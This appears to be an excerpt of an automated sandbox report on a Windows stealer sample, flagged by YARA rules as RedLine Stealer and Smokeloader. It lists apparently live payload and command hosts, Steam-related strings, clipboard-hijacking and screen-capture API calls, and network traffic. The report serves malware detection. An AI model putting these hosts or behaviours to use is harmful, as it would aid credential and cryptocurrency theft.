                  Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/
                  Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/$0
                  Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                  Source: hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeWX
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exel0
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exey0
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                  Source: 91B1.tmp.exe, 00000003.00000003.1471879039.000000000096A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api.
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apiV
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                  Source: 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.x
                  Source: 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/0g
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/P
                  Source: 91B1.tmp.exe, 00000003.00000003.1471879039.000000000096A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                  Source: 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/apim
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: hpEAJnNwCB.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE6
                  Source: hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE~
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/h.
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319008
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900ffuculttan.xyz
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shopr
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.10:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.10:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.10:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.10:49756 version: TLS 1.2
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_02491942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02491942
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_02492361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02492361
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_02492605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02492605
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004280220_2_00428022
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004071AB0_2_004071AB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004373D90_2_004373D9
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004274840_2_00427484
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004285600_2_00428560
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0043D6780_2_0043D678
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004166AF0_2_004166AF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004137250_2_00413725
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004277F60_2_004277F6
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0040E9740_2_0040E974
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0042EAE00_2_0042EAE0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00427AA00_2_00427AA0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00418AAF0_2_00418AAF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00436CBF0_2_00436CBF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00427D670_2_00427D67
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00413F0B0_2_00413F0B
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B82890_2_024B8289
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024BED470_2_024BED47
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A41720_2_024A4172
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B76EB0_2_024B76EB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024BD7550_2_024BD755
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B87C70_2_024B87C7
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B7A5D0_2_024B7A5D
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_0249EBDB0_2_0249EBDB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A69160_2_024A6916
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024A398C0_2_024A398C
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024C6F260_2_024C6F26
